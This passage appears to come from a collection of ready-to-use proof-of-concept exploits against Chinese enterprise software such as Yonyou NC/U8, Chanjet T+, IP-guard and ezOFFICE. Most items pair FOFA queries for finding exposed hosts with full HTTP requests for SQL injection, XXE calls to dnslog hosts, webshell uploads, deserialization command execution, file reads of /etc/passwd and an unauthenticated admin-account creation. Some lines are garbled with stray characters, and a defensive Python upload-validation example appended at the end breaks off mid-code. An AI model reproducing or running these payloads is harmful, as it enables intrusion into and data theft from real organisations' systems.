GET /portal/pt/servlet/runStateServlet/doPost?pageId=login&proDefPk=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: host
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Content-Type: application/x-www-form-urlencoded

32. Yonyou NC complainbilldetail SQL injection
version: NC633, NC65
FOFA:app="用友-UFIDA-NC"
GET /ebvp/advorappcoll/complainbilldetail?pageId=login&pk_complaint=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

33. Yonyou NC downTax/download SQL injection
version: NC6.5
FOFA:app="用友-UFIDA-NC"
GET /portal/pt/downTax/download?pageId=login&classid=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

6 G) [0 Z. t6 j) c6 n34. 用友NC warningDetailInfo接口SQL注入: v- J0 \* K1 K8 j! O
FOFA:app="用友-UFIDA-NC"
+ o$ V) R. `4 C3 u  a2 x" a# X% PGET /ebvp/infopub/warningDetailInfo?pageId=login&pkMessage=1'waitfor+delay+'0:0:5'-- HTTP/1.1
5 i% t& Z/ u" ?  L1 ZHost: your-ip. a5 N% H. i6 x3 a- {
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
2 @0 m, a8 r- B/ O; g! z4 F2 oContent-Type: application/x-www-form-urlencoded
- h9 I" b+ o& J  m* VAccept-Encoding: gzip, deflate( i0 ^* _/ c. v! R# V. ~9 k
Accept: */*5 t( V2 G  o4 y; t9 Q0 [6 Q) ]
Connection: keep-alive
/ ^/ \( }, R) x* V. k7 z
9 P) s0 M8 B( y7 Q$ r6 M& a# m4 V) ~, u3 Q8 a1 e- G% A% @4 P8 g
35. Yonyou NC-Cloud importhttpscer arbitrary file upload
FOFA:app="用友-NC-Cloud"
POST /nccloud/mob/pfxx/manualload/importhttpscer HTTP/1.1
Host: 203.25.218.166:8888
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
accessToken: eyJhbGciOiJIUzUxMiJ9.eyJwa19ncm91cCI6IjAwMDE2QTEwMDAwMDAwMDAwSkI2IiwiZGF0YXNvdXJjZSI6IjEiLCJsYW5nQ29kZSI6InpoIiwidXNlclR5cGUiOiIxIiwidXNlcmlkIjoiMSIsInVzZXJDb2RlIjoiYWRtaW4ifQ.XBnY1J3bVuDMYIfPPJXb2QC0Pdv9oSvyyJ57AQnmj4jLMjxLDjGSIECv2ZjH9DW5T0JrDM6UHF932F5Je6AGxA
Content-Length: 190
Content-Type: multipart/form-data; boundary=fd28cb44e829ed1c197ec3bc71748df0

--fd28cb44e829ed1c197ec3bc71748df0
Content-Disposition: form-data; name="file"; filename="./webapps/nc_web/1.jsp"

<%out.println(1111*1111);%>
--fd28cb44e829ed1c197ec3bc71748df0--

36. Yonyou NC-Cloud soapFormat XXE
FOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"
POST /uapws/soapFormat.ajax HTTP/1.1
Host: 192.168.40.130:8989
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0
Content-Length: 263
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/x-www-form-urlencoded
Upgrade-Insecure-Requests: 1

msg=<!DOCTYPE foo[<!ENTITY xxe1two SYSTEM "file:///C://windows/win.ini"> ]><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><soap:Fault><faultcode>soap:Server%26xxe1two%3b</faultcode></soap:Fault></soap:Body></soap:Envelope>%0a

37. Yonyou NC-Cloud IUpdateService XXE
FOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"
POST /uapws/service/nc.uap.oba.update.IUpdateService HTTP/1.1
Host: 192.168.40.130:8989
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
Content-Length: 421
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: text/xml;charset=UTF-8
SOAPAction: urn:getResult
Upgrade-Insecure-Requests: 1

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:iup="http://update.oba.uap.nc/IUpdateService">
<soapenv:Header/>
<soapenv:Body>
<iup:getResult>
<!--type: string-->
<iup:string><![CDATA[
<!DOCTYPE xmlrootname [<!ENTITY % aaa SYSTEM "http://c2vkbwbs.dnslog.pw">%aaa;%ccc;%ddd;]>
<xxx/>]]></iup:string>
</iup:getResult>
</soapenv:Body>
</soapenv:Envelope>

38. Yonyou U8 Cloud smartweb2.RPC.d XXE
FOFA:app="用友-U8-Cloud"
POST /hrss/dorado/smartweb2.RPC.d?__rpc=true HTTP/1.1
Host: 192.168.40.131:8088
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12_10) AppleWebKit/600.1.25 (KHTML, like Gecko) Version/12.0 Safari/1200.1.25
Content-Length: 260
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

__viewInstanceId=nc.bs.hrss.rm.ResetPassword~nc.bs.hrss.rm.ResetPasswordViewModel&__xml=<!DOCTYPE z [<!ENTITY Password SYSTEM "file:///C://windows//win.ini" >]><rpc transaction="10" method="resetPwd"><vps><p name="__profileKeys">%26Password;</p ></vps></rpc>

39. Yonyou U8 Cloud RegisterServlet SQL injection
FOFA:title="u8c"
POST /servlet/RegisterServlet HTTP/1.1
Host: 192.168.86.128:8089
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
Connection: close
Content-Length: 85
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
X-Forwarded-For: 127.0.0.1
Accept-Encoding: gzip

usercode=1' and substring(sys.fn_sqlvarbasetostr(HashBytes('MD5','123456')),3,32)>0--

40. Yonyou U8-Cloud XChangeServlet XXE
FOFA:app="用友-U8-Cloud"
POST /service/XChangeServlet HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Content-Type: text/xml
Connection: close

<!DOCTYPE r [<!ELEMENT r ANY ><!ENTITY xxe SYSTEM "http://farr9frh.dnslog.pw">]><r><a>&xxe;</a ></r>

41. Yonyou U8 Cloud MeasureQueryByToolAction SQL injection
FOFA:app="用友-U8-Cloud"
GET /service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.query.measurequery.MeasureQueryByToolAction&method=execute&query_id=1%27);WAITFOR+DELAY+%270:0:5%27--+ HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/json
Accept-Encoding: gzip
Connection: close

42. Yonyou GRP-U8 SmartUpload01 file upload
FOFA:app="用友-GRP-U8"
POST /u8qx/SmartUpload01.jsp HTTP/1.1
Host: x.x.x.x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryzhvrkrqt
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36

PAYLOAD

http://x.x.x.x/jatoolsreport?file=/1.pdf&as=dhtml

43. Yonyou GRP-U8 userInfoWeb SQL injection leading to RCE
FOFA:app="用友-GRP-U8"
POST /services/userInfoWeb HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
SOAPAction:
Content-Type: text/xml;charset=UTF-8

<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ser="http://service.pt.midas.ufgov.com">
   <soapenv:Header/>
   <soapenv:Body>
      <ser:getUserNameById soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
         <userId xsi:type="soapenc:string" xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/">';waitfor delay '0:0:5'--</userId>
      </ser:getUserNameById>
   </soapenv:Body>
</soapenv:Envelope>

44. Yonyou GRP-U8 bx_dj_check.jsp SQL injection
FOFA:app="用友-GRP-U8"
GET /u8qx/bx_dj_check.jsp?djlxdm=OER&djid=1';waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

45. Yonyou GRP-U8 ufgovbank XXE
FOFA:app="用友-GRP-U8"
POST /ufgovbank HTTP/1.1
Host: 192.168.40.130:222
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0
Connection: close
Content-Length: 161
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

reqData=<?xml version="1.0"?>
<!DOCTYPE foo SYSTEM "http://c2vkbwbs.dnslog.pw">&signData=1&userIP=1&srcFlag=1&QYJM=0&QYNC=adaptertest

46. Yonyou GRP-U8 sqcxIndex.jsp SQL injection
FOFA:app="用友-GRP-U8"
GET /u8qx/sqcxIndex.jsp?key=1');+waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

47. Yonyou GRP A++Cloud Government Finance Cloud arbitrary file read
FOFA:body="/pf/portal/login/css/fonts/style.css"
GET /ma/emp/maEmp/download?fileName=../../../etc/passwd HTTP/1.1
Host: x.x.x.x
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
If-Modified-Since: Wed, 11 Oct 2023 05:16:05 GMT
Connection: close

48. Yonyou U8 CRM swfupload arbitrary file upload
FOFA:title="用友U8CRM"
POST /ajax/swfupload.php?DontCheckLogin=1&vname=file HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data;boundary=----269520967239406871642430066855

------269520967239406871642430066855
Content-Disposition: form-data; name="file"; filename="s.php"
1231
Content-Type: application/octet-stream
------269520967239406871642430066855
Content-Disposition: form-data; name="upload"
upload
------269520967239406871642430066855--

49. Yonyou U8 CRM uploadfile.php interface arbitrary file upload
FOFA:body="用友U8CRM"
POST /ajax/uploadfile.php?DontCheckLogin=1&vname=file HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Content-Length: 329
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: multipart/form-data; boundary=---------------------------vvv3wdayqv3yppdxvn3w

-----------------------------vvv3wdayqv3yppdxvn3w
Content-Disposition: form-data; name="file"; filename="%s.php "
Content-Type: application/octet-stream

wersqqmlumloqa
-----------------------------vvv3wdayqv3yppdxvn3w
Content-Disposition: form-data; name="upload"

upload
-----------------------------vvv3wdayqv3yppdxvn3w--

http://x.x.x.x/tmpfile/updB3CB.tmp.php

50. QDocs Smart School 6.4.1 filterRecords SQL injection
FOFA:body="close closebtnmodal"
POST /course/filterRecords/ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Content-Length: 224
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

searchdata[0][title]=&searchdata[0][searchfield]=1&searchdata[0][searchvalue]=1&searchdata[1][title]=1&searchdata[1][searchfield]=1=1 and extractvalue(1,concat(0x5e,(select md5(123456)),0x5e))%23&searchdata[1][searchvalue]=1

51. Yunshikong Social Commerce ERP System (云时空社会化商业ERP系统) validateLoginName SQL injection
FOFA:app="云时空社会化商业ERP系统"
GET /sys/user/validateLoginName?loginName=admin'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

52. Weaver (泛微) E-Office json_common.php SQL injection
FOFA:app="泛微-EOffice"
POST /building/json_common.php HTTP/1.1
Host: 192.168.86.128:8097
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Content-Length: 87
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

tfs=city` where cityId =-1 /*!50000union*/ /*!50000select*/1,2,md5(102103122) ,4#|2|333

53. DPTech (迪普) VPN Service arbitrary file upload
FOFA:app="DPtech-SSLVPN"
/..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd

54. Chanjet (畅捷通) T+ getstorewarehousebystore remote code execution
FOFA:app="畅捷通-TPlus"
Step 1: send the request below to the target. It executes a command that writes the given string into the given file:
"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"

Full request:
POST /tplus/ajaxpro/Ufida.T.CodeBehind._PriorityLevel,App_Code.ashx?method=GetStoreWarehouseByStore HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F
Content-Length: 593

{
  "storeID":{
    "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
    "MethodName":"Start",
    "ObjectInstance":{
      "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
      "StartInfo":{
        "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
        "FileName":"cmd",
        "Arguments":"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"
      }
    }
  }
}

Step 2: request the following URL:
/tplus/.2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt

55. Chanjet T+ getdecallusers information disclosure
FOFA:app="畅捷通-TPlus"
Step 1: obtain a Cookie through the interface
/tplus/ajaxpro/Ufida.T.SM.Login.UIP.LoginManager,Ufida.T.SM.Login.UIP.ashx?method=CheckPassword
Step 2: with the obtained Cookie, request
/tplus/sm/privilege/ajaxpro/Ufida.T.SM.UIP.Privilege.PreviligeControl,Ufida.T.SM.UIP.ashx?method=GetDecAllUsers

56. Chanjet T+ RRATableController,Ufida.T.DI.UIP.ashx deserialization RCE
FOFA: app="畅捷通-TPlus"
POST /tplus/ajaxpro/Ufida.T.DI.UIP.RRA.RRATableController,Ufida.T.DI.UIP.ashx?method=GetStoreWarehouseByStore HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
Content-Type: application/json

{
  "storeID":{
    "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
    "MethodName":"Start",
    "ObjectInstance":{
      "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
      "StartInfo": {
        "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
        "FileName":"cmd", "Arguments":"/c ping 6qevyvmi.dnslog.pw"
      }
    }
  }
}

57. Chanjet T+ keyEdit.aspx SQL injection
FOFA:app="畅捷通-TPlus"
GET /tplus/UFAQD/keyEdit.aspx?KeyID=1%27%20and%201=(select%20@@version)%20--&preload=1 HTTP/1.1
Host: host
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

58. Chanjet T+ KeyInfoList.aspx SQL injection
FOFA:app="畅捷通-TPlus"
GET /tplus/UFAQD/KeyInfoList.aspx?preload=1&zt=')AND+1+IN+(SELECT+sys.fn_varbintohexstr(hashbytes('MD5','123456')))--+ HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

59. XETUX software dynamiccontent.properties.xhtml remote code execution
FOFA: title="@XETUX" && title="XPOS" && body="BackEnd"
POST /xc-one-pos/javax.faces.resource/dynamiccontent.properties.xhtml HTTP/1.1
Host: 192.168.86.128:9090
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36
Connection: close
Content-Length: 1669
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

PAYLOAD

60. 百卓 Smart 管理平台 (Byzoro Smart management platform) importexport.php SQL injection
FOFA: title="Smart管理平台"
GET /importexport.php?sql=c2VsZWN0IDEsdXNlcigpLDM=&type=exportexcelbysql HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

61. 浙大恩特客户资源管理系统 (Zheda Ente customer resource management system) fileupload arbitrary file upload
FOFA: title="欢迎使用浙大恩特客户资源管理系统"
POST /entsoft_en/entereditor/jsp/fileupload.jsp?filename=8uxssX66eqrqtKObcVa0kid98xa.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 27
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: en
Content-Type: application/x-www-form-urlencoded

8uxssX66eqrqtKObcVa0kid98xa

62. IP-guard WebServer remote command execution
FOFA: "IP-guard" && icon_hash="2030860561"
GET /ipg/static/appr/lib/flexpaper/php/view.php?doc=11.jpg&format=swf&isSplit=true&page=||echo+"09kdujzKJDLinkQTLfGzMMKDJ23HJ"+>09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

Then access:

GET /ipg/static/appr/lib/flexpaper/php/09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1
Host: x.x.x.x

63. IP-guard WebServer arbitrary file read
IP-guard < 4.82.0609.0
FOFA: icon_hash="2030860561"
POST /ipg/appr/MApplyList/downloadFile_client/getdatarecord HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

path=..%2Fconfig.ini&filename=1&action=download&hidGuid=1v%0D%0A

64. 捷诚管理信息系统 (Jiecheng management information system) CWSFinanceCommon SQL injection
FOFA: body="/Scripts/EnjoyMsg.js"
POST /EnjoyRMIS_WS/WS/APS/CWSFinanceCommon.asmx HTTP/1.1
Host: 192.168.86.128:9001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Connection: close
Content-Length: 369
Accept: */*
Accept-Language: en
Content-Type: text/xml; charset=utf-8
Accept-Encoding: gzip

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
  <soap:Body>
    <GetOSpById xmlns="http://tempuri.org/">
      <sId>1';waitfor delay '0:0:5'--+</sId>
    </GetOSpById>
  </soap:Body>
</soap:Envelope>

65. 优卡特脸爱云一脸通智慧管理平台 (face-recognition access management platform) 1.0.55.0.0.1 authorization bypass
FOF: title="欢迎使用脸爱云 一脸通智慧管理平台"
A 200 response means the account test123456/123456 was created successfully.
POST /SystemMng.ashx HTTP/1.1
Host:
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Accept-Language: en
Content-Length: 174

operatorName=test123456&operatorPwd=123456&operpassword=123456&operatorRole=00&visible_jh=%E8%AF%B7%E9%80%89%E6%8B%A9&visible_dorm=%E8%AF%B7%E9%80%89%E6%8B%A9&funcName=addOperators

66. 万户 ezOFFICE 协同管理平台 (Wanhu ezOFFICE collaborative management platform) SendFileCheckTemplateEdit SQL injection
FOFA: app="万户ezOFFICE协同管理平台"

GET /defaultroot/public/iWebOfficeSign/Template/SendFileCheckTemplateEdit.jsp?RecordID=1'%20UNION%20ALL%20SELECT%20sys.fn_sqlvarbasetostr(HashBytes(%27MD5%27,%27102103122%27))%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL-- HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

The vulnerability is confirmed when lines 42 and 43 of the response contain the string 6cfe798ba8e5b85feb50164c59f4bec9.

67. 万户 ezOFFICE (Wanhu ezOFFICE) wpsservlet arbitrary file upload
FOFA: app="万户网络-ezOFFICE"
The newdocId and filename parameters set the name of the written file, the dir parameter sets the directory it is written to, and the fileType parameter sets the file extension.
POST /defaultroot/wpsservlet?option=saveNewFile&newdocId=apoxkq&dir=../platform/portal/layout/&fileType=.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Content-Length: 173
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Connection: close
Content-Type: multipart/form-data; boundary=ufuadpxathqvxfqnuyuqaozvseiueerp
DNT: 1
Upgrade-Insecure-Requests: 1

--ufuadpxathqvxfqnuyuqaozvseiueerp
Content-Disposition: form-data; name="NewFile"; filename="apoxkq.jsp"

<% out.print("sasdfghjkj");%>
--ufuadpxathqvxfqnuyuqaozvseiueerp--

The uploaded file is reachable at /defaultroot/platform/portal/layout/apoxkq.jsp

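The wpsservlet request above lets the caller pick the directory (dir), the base name (newdocId/filename) and the extension (fileType) of the file that gets written, which is exactly the combination that turns a document-save endpoint into a webshell drop. The Python below is added here as an illustration of the validation such an endpoint needs; it is not code from the ezOFFICE product or from the original post, and UPLOAD_ROOT and the sample inputs are constructed. It refuses executable extensions with an allow-list, rejects base names that carry separators or a second extension, rejects any ".." directory component, and finally checks that the resolved path still lies under the upload root.

```python
import os

# Constructed upload root for the example; a real deployment would configure this.
UPLOAD_ROOT = "/srv/app/uploads"
UPLOAD_ROOT_REAL = os.path.realpath(UPLOAD_ROOT)

# Allow-list of extensions the endpoint may write. Server-executable types
# (.jsp, .aspx, .php, ...) are deliberately absent, so fileType=.jsp is refused
# before any path handling happens.
ALLOWED_EXTENSIONS = {".png", ".jpg", ".jpeg", ".gif", ".pdf", ".docx", ".xlsx", ".txt"}


def normalize_extension(user_ext):
    """Lower-case the caller's extension and make sure it has exactly one leading dot."""
    ext = user_ext.strip().lower()
    if not ext.startswith("."):
        ext = "." + ext
    return ext


def split_user_dir(user_dir):
    """Split a caller-supplied relative directory into components, treating
    backslashes as separators and dropping empty and '.' components."""
    return [p for p in user_dir.replace("\\", "/").split("/") if p not in ("", ".")]


def check_upload(user_dir, user_name, user_ext):
    """Validate the three caller-controlled fields (directory, base name,
    extension) and return (True, absolute_path) or (False, reason).

    The split mirrors the wpsservlet parameters dir / newdocId / fileType;
    the logic is written for this example and is not the product's own.
    """
    ext = normalize_extension(user_ext)
    if ext not in ALLOWED_EXTENSIONS:
        return False, f"extension not allowed: {user_ext!r}"

    # Base name: no separators, no NUL, no traversal names, and no embedded dot
    # so that newdocId=shell.jsp cannot smuggle a second extension.
    if not user_name or user_name in (".", "..") or any(c in user_name for c in "/\\.\x00"):
        return False, f"bad base name: {user_name!r}"

    parts = split_user_dir(user_dir)
    if any(p == ".." for p in parts):
        return False, f"directory traversal in dir: {user_dir!r}"

    candidate = os.path.realpath(os.path.join(UPLOAD_ROOT_REAL, *parts, user_name + ext))
    # Defence in depth: after symlink resolution the target must still be under the root.
    if os.path.commonpath([UPLOAD_ROOT_REAL, candidate]) != UPLOAD_ROOT_REAL:
        return False, f"path escapes upload root: {candidate!r}"
    return True, candidate


if __name__ == "__main__":
    for args in [("attachments/2024", "report", ".pdf"),
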